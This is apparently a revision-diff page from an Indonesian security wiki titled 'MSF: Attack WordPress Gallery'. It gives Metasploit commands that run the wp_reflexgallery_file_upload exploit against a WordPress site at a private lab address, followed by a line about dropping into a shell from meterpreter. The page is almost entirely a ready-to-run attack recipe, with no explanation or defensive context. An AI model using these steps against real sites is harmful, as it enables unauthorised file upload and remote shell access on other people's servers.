Difference between revisions of "MSF: Attack WordPress Gallery"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "Attack ReflexGallery use exploit/unix/webapp/wp_reflexgallery_file_upload set RHOST 192.168.12.120 set RPORT 80 set TARGETURI /wordpress/ run")
 
 
Line 6: Line 6:
 
  set TARGETURI /wordpress/
 
  set TARGETURI /wordpress/
 
  run
 
  run
 +
 +
 +
Masuk ke shell dari meterpreter

Latest revision as of 05:17, 30 July 2020

Attack ReflexGallery

use exploit/unix/webapp/wp_reflexgallery_file_upload
set RHOST 192.168.12.120
set RPORT 80
set TARGETURI /wordpress/
run


Masuk ke shell dari meterpreter